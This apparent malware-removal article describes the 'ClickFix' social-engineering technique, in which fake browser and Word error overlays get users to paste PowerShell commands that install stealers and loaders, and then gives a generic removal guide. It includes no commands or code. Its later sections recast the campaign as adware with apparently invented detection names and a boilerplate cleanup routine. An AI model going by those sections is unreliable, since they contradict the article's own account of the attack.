ClickFix Malware is a deceptive and harmful software designed to infiltrate computers, disrupt their normal operations, and potentially steal sensitive information. As part of a broader category of malicious programs, ClickFix Malware poses significant risks to both individual users and organizations. Understanding its behavior, recognizing its symptoms, and knowing how to effectively remove it are crucial for maintaining cybersecurity.
Actions and Consequences of ClickFix Malware
Cyber threat actors have escalated their tactics by employing JavaScript embedded in HTML attachments and compromising legitimate websites. These methods now include overlays that mimic error messages from widely used applications such as Google Chrome, Microsoft Word, and OneDrive. These deceptive alerts coerce users into clicking on a button to copy a PowerShell command purportedly to fix the displayed issue. Users are then instructed to paste and execute this command in either a Run dialog or a PowerShell prompt.
While these attacks heavily rely on user interaction, their social engineering tactics are sophisticated enough to create a sense of urgency and legitimacy. This can prompt users to act hastily without fully assessing the potential risks involved. Security researchers have identified several malicious payloads used in these attacks, including DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and the Lumma Stealer.
The fraudulent scripts employed in these attacks are designed to deliver malware directly onto users’ devices. Analysts have identified three distinct attack vectors characterized by their initial stages, with the first not definitively linked to a specific threat actor group.
In the first scenario, attributed to threat actors associated with ClearFake, compromised websites load malicious scripts hosted via Binance’s Smart Chain contracts. These scripts trigger fake Google Chrome alerts claiming issues with web page display, prompting users to install a ‘root certificate’ by executing a PowerShell script in a Windows PowerShell (Admin) console. Upon execution, this script validates the target device, clears clipboard contents, and initiates the download of a remote PowerShell script that conducts anti-VM checks before deploying an information-stealing payload.
Another attack vector, part of the ‘ClickFix’ campaign, involves injecting code into compromised websites to display an overlay simulating a Google Chrome error. Users are directed to open ‘Windows PowerShell (Admin)’ and paste provided code, resulting in infections similar to those described previously.
Additionally, attackers utilize email-based methods featuring HTML attachments masquerading as Microsoft Word documents. These attachments prompt users to install a ‘Word Online’ extension for proper document viewing. Error messages within these documents offer ‘How to fix’ and ‘Auto-fix’ options. Choosing ‘How to fix’ copies a base64-encoded PowerShell command to the clipboard, instructing users to execute it in PowerShell. ‘Auto-fix’ uses the search-ms protocol to display a WebDAV-hosted ‘fix.msi’ or ‘fix.vbs’ file from an attacker-controlled file share. These PowerShell commands download and execute either an MSI file or a VBS script, leading to infections by Matanbuchus or DarkGate, respectively.
Throughout these scenarios, threat actors exploit users’ unfamiliarity with the risks associated with executing PowerShell commands and capitalize on Windows’ limitations in detecting and preventing these actions.
The diverse attack strategies observed by researchers highlight the proactive efforts of threat actor group TA571 to enhance their effectiveness and discover new avenues for infecting more systems. This adaptive approach underscores their commitment to evolving tactics and expanding their impact within the cybersecurity landscape.
ClickFix Malware can perform a range of malicious activities once it infiltrates a system:
- Adware and Pop-ups: One of the primary actions of ClickFix Malware is displaying intrusive advertisements and pop-ups. These ads can lead to malicious websites that might further infect the system.
- Browser Hijacking: It can change browser settings, redirect search queries to unwanted websites, and alter the homepage without user consent.
- System Slowdown: The malware consumes system resources, leading to significant slowdowns and decreased performance.
- Data Theft: In more severe cases, ClickFix Malware can capture sensitive information, such as login credentials, credit card numbers, and personal data.
- Unauthorized Access: The malware might open backdoors for other malicious entities to access the infected system.
The consequences of these actions include compromised privacy, financial loss, and the risk of further infections.
Detection Names for ClickFix Malware
Different antivirus and cybersecurity tools may identify ClickFix Malware under various names, including:
- Adware.ClickFix
- Trojan.ClickFix
- PUA.ClickFix
- BrowserModifier:Win32/ClickFix
These detection names reflect the diverse nature of the malware and its potential impact on infected systems.
Similar Threats
ClickFix Malware shares similarities with other types of malware, including:
- Adware.Elex: Similar in its adware capabilities, causing unwanted advertisements and pop-ups.
- BrowserModifier:Win32/SupTab: Known for browser hijacking and redirecting search queries.
- Trojan.Win32.Generic: A general category for trojans that perform various malicious activities, including data theft and unauthorized access.
- PUA.Win32.Conduit: Potentially Unwanted Applications (PUAs) that change browser settings and slow down the system.
Removal Guide for ClickFix Malware
Step 1: Identify the Malware
- Check for Unusual Activity: Look for signs like unexpected ads, browser redirects, and system slowdowns.
- Use Windows Task Manager: Press
Ctrl + Shift + Esc
to open Task Manager and look for unfamiliar processes. - Inspect Installed Programs: Go to
Control Panel > Programs and Features
to identify and remove suspicious applications.
Step 2: Boot in Safe Mode
- Restart the Computer: Press
F8
repeatedly before Windows loads to access Advanced Boot Options. - Select Safe Mode: Choose Safe Mode with Networking to minimize the number of active processes and make malware removal easier.
Step 3: Remove Malware Files
- Delete Temporary Files: Use the Disk Cleanup tool to remove temporary files that might harbor malware remnants.
- Manually Delete Suspicious Files:
- Navigate to
C:\Program Files
andC:\Program Files (x86)
to delete folders related to the malware. - Check
C:\Users\[Your Username]\AppData\Local
andC:\Users\[Your Username]\AppData\Roaming
for suspicious files and folders.
Step 4: Restore Browser Settings
- Reset Browser Settings: Go to the settings menu of your browser and find the option to reset settings to default.
- Remove Unwanted Extensions: Check the extensions/add-ons manager of your browser and remove unfamiliar entries.
Step 5: Update and Scan with Windows Defender
- Update Windows Defender: Ensure your Windows Defender is up to date.
- Run a Full Scan: Open Windows Defender and perform a full system scan to detect and remove any remaining malware traces.
Step 6: Clean the Registry
- Open Registry Editor: Press
Win + R
, typeregedit
, and press Enter. - Backup the Registry: Before making changes, backup the registry.
- Delete Malware Entries: Navigate to
HKEY_CURRENT_USER\Software
,HKEY_LOCAL_MACHINE\SOFTWARE
, andHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node
to delete entries related to the malware.
Step 7: Perform a Final Check
- Monitor System Performance: Ensure there are no unusual activities or performance issues.
- Check Network Activity: Use tools like Resource Monitor to check for abnormal network activity.
Best Practices for Preventing Future Infections
- Regular Software Updates: Keep your operating system, browsers, and all software up to date to protect against vulnerabilities.
- Use Strong Passwords: Implement complex passwords and change them regularly.
- Avoid Suspicious Links: Do not click on unknown links or download attachments from untrusted sources.
- Enable Firewall: Ensure your firewall is active to block unauthorized access.
- Educate Yourself: Stay informed about the latest cyber threats and security practices.
By following this comprehensive guide, users can effectively remove ClickFix Malware from their systems and take steps to prevent future infections, ensuring their digital environments remain secure and efficient.